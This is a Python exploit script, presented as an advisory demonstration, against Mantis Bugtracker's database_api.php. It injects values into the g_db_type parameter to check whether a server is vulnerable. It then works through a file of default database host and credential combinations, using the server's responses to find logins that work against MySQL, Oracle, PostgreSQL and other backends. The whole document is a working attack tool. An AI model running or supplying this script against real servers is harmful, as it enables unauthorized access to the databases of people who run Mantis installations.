#!/usr/bin/env python

"""
Mantis Bugtracker Remote Database Scanner Exploit v 1.0

Author: Jose Antonio Coret (Joxean Koret)
E-mail: joxeankoret<<<<<<<<<<<<<<<<at>>>>>>>>>>>>>>>>>>yah00<<<<DOT>>>>es

This exploit is under the GPL License, version 2.

This demonstration is provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

"""

import sys
import urllib

def check_vulnerable(mantis_site):
	try:
		data = urllib.urlopen(mantis_site + '/core/database_api.php?g_db_type=trying_it').read()
		
		if data.rfind("trying_it") > -1:
			return True
		else:
			return False
	except:
		print ""
		print "Error getting document: " + str(sys.exc_info()[1])
		sys.exit(0)
		
def try_login_step(mantis_site, host):

	try:
		data = urllib.urlopen(mantis_site + '/core/database_api.php?g_db_type=' + host).read()
		
		if data == "":
			return True
		else:
			try:
				print " [-] ERROR: " + data.split('<b>Warning</b>:')[1].split(' in <b>')[0].strip(' ')
			except:
				print ""
				print "RESPONSE FROM SERVER: "
				print "-----------------------------------------------------------------------------"
				print data
				print "-----------------------------------------------------------------------------"

			return False
	except:
		print ""
		print "Error getting document: " + str(sys.exc_info()[1])
		sys.exit(0)

def try_login(mantis_site, db_type):

	try:
		hosts = open("hosts." + db_type, "r")
	except:
		print "Error opening username/password combinations file for database type " + db_type + " (hosts." + db_type + ")"
		print sys.exc_info()[1]
		sys.exit(0)

	for line in hosts:
		print "Trying " + line.rstrip() + " ... "
		if try_login_step(mantis_site, line.rstrip()):
			print " [!] " + line.rstrip() + " apparently works!"
	

print "Mantis Bugtracker Database Scanner Exploit"
print ""
print "Author: Jose Antonio Coret"
print ""


try:
	mantis_site = raw_input("Mantis Bug Tracker server site [http://localhost/mantis]: ");

	if mantis_site == "":
		mantis_site = "http://localhost/mantis";
except:
	print "Aborted"
	sys.exit(0)


print " [+] Checking if it is vulnerable ... "
if check_vulnerable(mantis_site):
	print " [!] Yes, it is vulnerable"
else:
	print " [-] No, it is not vulnerable"
	print " [+] Exiting"
	sys.exit(0)

print ""
try:
	res = raw_input("Try default username and password combinatios for the local database (yes, do it/n)? [n] ")
except:
	print "Aborted"
	sys.exit(0)

if res == "yes, do it":
	try:
		res = raw_input("Default database to check (mysql, informix, oracle, firebird, pgsql, all)? [mysql] ")

		if res == "":
			res = "mysql"

		print ""
		try_login(mantis_site, res)
	except:
		print "Aborted"
		sys.exit(0)
else:
	if res != "" and res != "n":
		print ""
		print "ERROR: You need to write 'yes, do it'. Cancelled."

	sys.exit(0)

print ""
print "Test finished"